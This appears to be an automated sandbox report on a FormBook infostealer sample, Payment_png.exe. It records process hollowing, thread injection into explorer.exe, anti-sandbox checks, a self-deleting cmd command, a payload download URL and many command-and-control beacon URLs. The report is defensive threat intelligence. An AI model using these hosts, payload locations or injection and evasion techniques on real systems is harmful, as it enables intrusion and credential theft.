      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4341E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4269A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00564377 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00564B11 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00563BE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00562410 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C3A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C9C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C2746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C2B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C3AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CD740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C86C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CC1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C3BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C86DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C86DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C1D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CCFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CB8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C32581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C02D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CC2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C3FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04CD05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 14_2_04C335A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe Network Connect: 198.54.117.218 80
      Source: C:\Windows\explorer.exe Domain query: www.loversdeal.com
      Source: C:\Windows\explorer.exe Domain query: www.uforservice.com
      Source: C:\Windows\explorer.exe Domain query: www.slutefuter.com
      Source: C:\Windows\explorer.exe Domain query: www.booksfall.com
      Source: C:\Windows\explorer.exe Network Connect: 66.96.160.133 80
      Source: C:\Windows\explorer.exe Network Connect: 23.227.38.32 80
      Source: C:\Windows\explorer.exe Domain query: www.plowbrothers.com
      Source: C:\Windows\explorer.exe Domain query: www.choupisson.com
      Source: C:\Windows\explorer.exe Network Connect: 217.160.0.233 80
      Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
      Source: C:\Windows\explorer.exe Domain query: www.domennyarendi39.net
      Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe Domain query: www.birkenhof-allgaeu.net
      Source: C:\Windows\explorer.exe Domain query: www.pcpartout.com
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\Payment_png.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Payment_png.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\Payment_png.exe Thread register set: target process: 3388
      Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3388
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\Payment_png.exe Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\Payment_png.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E70000
      Source: C:\Users\user\Desktop\Payment_png.exe Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
      Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
      Source: explorer.exe, 00000006.00000002.469681578.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp Binary or memory string: Program Manager
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000006.00000002.470675948.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 0000000E.00000002.470825013.00000000034A0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2988, type: MEMORY
      Source: Yara match File source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion22 | OS Credential Dumping | Security Software Discovery721 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion22 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information2 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol114 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | System Information Discovery31 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

      Behavior Graph

      Behavior Graph ID: 377352  Sample: Payment_png.exe  Startdate: 29/03/2021  Architecture: WINDOWS  Score: 100

      Process tree and annotations carried by the graph:

      Start (DNS/IP: www.silverdollarcafe.com, www.accinf5.com, silverdollarcafe.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 9 other signatures)
        started Payment_png.exe (signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement), Detected RDTSC dummy instruction sequence (likely for instruction hammering), Tries to detect Any.run, 3 other signatures)
          started Payment_png.exe (DNS/IP: www.aps-mm.com; aps-mm.com 170.249.199.106, 443, 49712, 49713 PRIVATESYSTEMSUS United States; signatures: Modifies the context of a thread in another process (thread injection), Tries to detect Any.run, Maps a DLL or memory area into another process, 3 other signatures)
            injected explorer.exe (DNS/IP: www.birkenhof-allgaeu.net 217.160.0.233, 49738, 80 ONEANDONE-ASBrauerstrasse48DE Germany; uforservice.com 23.227.38.32, 49742, 80 CLOUDFLARENETUS Canada; 15 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit))
              started colorcpl.exe (signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements)
                started cmd.exe
                  started conhost.exe

      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Payment_png.exe | 70% | Virustotal |
      Payment_png.exe | 22% | Metadefender |
      Payment_png.exe | 79% | ReversingLabs | Win32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      14.2.colorcpl.exe.30327b8.2.unpack | 100% | Avira | TR/Dropper.Gen
      14.2.colorcpl.exe.5117960.5.unpack | 100% | Avira | TR/Dropper.Gen

      Domains

      Source | Detection | Scanner | Label
      td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |
      aps-mm.com | 2% | Virustotal |
      silverdollarcafe.com | 0% | Virustotal |

      URLs

      Source | Detection | Scanner | Label
      http://www.uforservice.com | 0% | Avira URL Cloud | safe
      http://www.aainakari.com | 0% | Avira URL Cloud | safe
      http://www.accinf5.com/c8bs/www.silverdollarcafe.com | 0% | Avira URL Cloud | safe
      http://www.silverdollarcafe.comReferer: | 0% | Avira URL Cloud | safe
      http://www.accinf5.com | 0% | Avira URL Cloud | safe
      http://www.domennyarendi39.net/c8bs/www.accinf5.com | 0% | Avira URL Cloud | safe
      http://www.loversdeal.comReferer: | 0% | Avira URL Cloud | safe
      http://www.slutefuter.comReferer: | 0% | Avira URL Cloud | safe
      http://www.sajatypeworks.com | 0% | URL Reputation | safe
      http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
      http://www.pcpartout.comReferer: | 0% | Avira URL Cloud | safe
      http://www.birkenhof-allgaeu.net/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.silverdollarcafe.com | 0% | Avira URL Cloud | safe
      http://www.aainakari.com/c8bs/www.bostonm.info | 0% | Avira URL Cloud | safe
      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
      http://www.plowbrothers.com | 0% | Avira URL Cloud | safe
      http://www.silverdollarcafe.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.urwpp.deDPlease | 0% | URL Reputation | safe
      http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
      http://www.choupisson.comReferer: | 0% | Avira URL Cloud | safe
      http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com | 0% | Avira URL Cloud | safe
      http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net | 0% | Avira URL Cloud | safe
      http://www.birkenhof-allgaeu.net | 0% | Avira URL Cloud | safe
      http://www.booksfall.com | 0% | Avira URL Cloud | safe
      http://www.quantify-co.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.plowbrothers.comReferer: | 0% | Avira URL Cloud | safe
      http://www.domentemenegi42.net | 0% | Avira URL Cloud | safe
      http://www.pcpartout.com/c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe
      http://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe
      http://www.bostonm.info/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.carterandcone.coml | 0% | URL Reputation | safe
      http://www.aainakari.comReferer: | 0% | Avira URL Cloud | safe
      http://www.plowbrothers.com/c8bs/www.slutefuter.com | 0% | Avira URL Cloud | safe
      http://www.booksfall.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.domennyarendi39.net | 0% | Avira URL Cloud | safe
      http://aps-mm.com/bin_BNUtTDfY243.bin | 0% | Avira URL Cloud | safe
      http://www.aainakari.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.loversdeal.com/c8bs/www.booksfall.com | 0% | Avira URL Cloud | safe
      http://www.uforservice.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.uforservice.com/c8bs/www.domennyarendi39.net | 0% | Avira URL Cloud | safe
      http://www.plowbrothers.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe
      http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
      http://www.pcpartout.com | 0% | Avira URL Cloud | safe
      http://www.choupisson.com | 0% | Avira URL Cloud | safe
      http://www.domentemenegi42.net/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.plowbrothers.com/c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe
      http://www.broskiusa.comReferer: | 0% | Avira URL Cloud | safe
      http://www.tiro.com | 0% | URL Reputation | safe
      http://www.accinf5.comReferer: | 0% | Avira URL Cloud | safe
      http://www.goodfont.co.kr | 0% | URL Reputation | safe
      http://www.domennyarendi39.net/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.domennyarendi39.netReferer: | 0% | Avira URL Cloud | safe
      http://www.choupisson.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.slutefuter.com | 0% | Avira URL Cloud | safe
      http://www.typography.netD | 0% | URL Reputation | safe
      http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
      http://fontfabrik.com | 0% | URL Reputation | safe
      http://www.choupisson.com/c8bs/www.uforservice.com | 0% | Avira URL Cloud | safe
      www.booksfall.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.bostonm.info/c8bs/www.quantify-co.com | 0% | Avira URL Cloud | safe
      http://www.slutefuter.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.booksfall.com/c8bs/www.pcpartout.com | 0% | Avira URL Cloud | safe
      http://www.broskiusa.com/c8bs/www.aainakari.com | 0% | Avira URL Cloud | safe
      http://www.sandoll.co.kr | 0% | URL Reputation | safe
      http://www.sakkal.com | 0% | URL Reputation | safe
      http://www.aps-mm.com/bin_BNUtTDfY243.bin | 0% | Avira URL Cloud | safe
      http://www.silverdollarcafe.com/c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe
      http://www.broskiusa.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.loversdeal.com/c8bs/ | 0% | Avira URL Cloud | safe
      http://www.birkenhof-allgaeu.net/c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe
      http://www.uforservice.com/c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      plowbrothers.com | 34.102.136.180 | true | false | | unknown
      td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
      aps-mm.com | 170.249.199.106 | true | false | | unknown
      parkingpage.namecheap.com | 198.54.117.218 | true | false | | high
      silverdollarcafe.com | 34.102.136.180 | true | false | | unknown
      uforservice.com | 23.227.38.32 | true | true | | unknown
      www.birkenhof-allgaeu.net | 217.160.0.233 | true | true | | unknown
      www.choupisson.com | 66.96.160.133 | true | true | | unknown
      www.loversdeal.com | unknown | unknown | true | | unknown
      www.uforservice.com | unknown | unknown | true | | unknown
      www.slutefuter.com | unknown | unknown | true | | unknown
      www.booksfall.com | unknown | unknown | true | | unknown
      www.plowbrothers.com | unknown | unknown | true | | unknown
      www.aps-mm.com | unknown | unknown | true | | unknown
      www.domennyarendi39.net | unknown | unknown | true | | unknown
      www.accinf5.com | unknown | unknown | true | | unknown
      www.pcpartout.com | unknown | unknown | true | | unknown
      www.silverdollarcafe.com | unknown | unknown | true | | unknown

                                    Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://www.pcpartout.com/c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp | false | Avira URL Cloud: safe | unknown
      http://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp | true | Avira URL Cloud: safe | unknown
      http://aps-mm.com/bin_BNUtTDfY243.bin | false | Avira URL Cloud: safe | unknown
      http://www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp | true | Avira URL Cloud: safe | unknown
      http://www.plowbrothers.com/c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp | false | Avira URL Cloud: safe | unknown
      www.booksfall.com/c8bs/ | true | Avira URL Cloud: safe | low
      http://www.aps-mm.com/bin_BNUtTDfY243.bin | false | Avira URL Cloud: safe | unknown
      http://www.silverdollarcafe.com/c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp | false | Avira URL Cloud: safe | unknown
      http://www.birkenhof-allgaeu.net/c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp | true | Avira URL Cloud: safe | unknown
      http://www.uforservice.com/c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.uforservice.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.aainakari.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.accinf5.com/c8bs/www.silverdollarcafe.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.silverdollarcafe.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.accinf5.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.domennyarendi39.net/c8bs/www.accinf5.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.loversdeal.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slutefuter.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.pcpartout.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.birkenhof-allgaeu.net/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.silverdollarcafe.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.aainakari.com/c8bs/www.bostonm.info | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.plowbrothers.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.silverdollarcafe.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.choupisson.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.birkenhof-allgaeu.net | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.booksfall.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quantify-co.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.plowbrothers.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.domentemenegi42.net | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bostonm.info/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
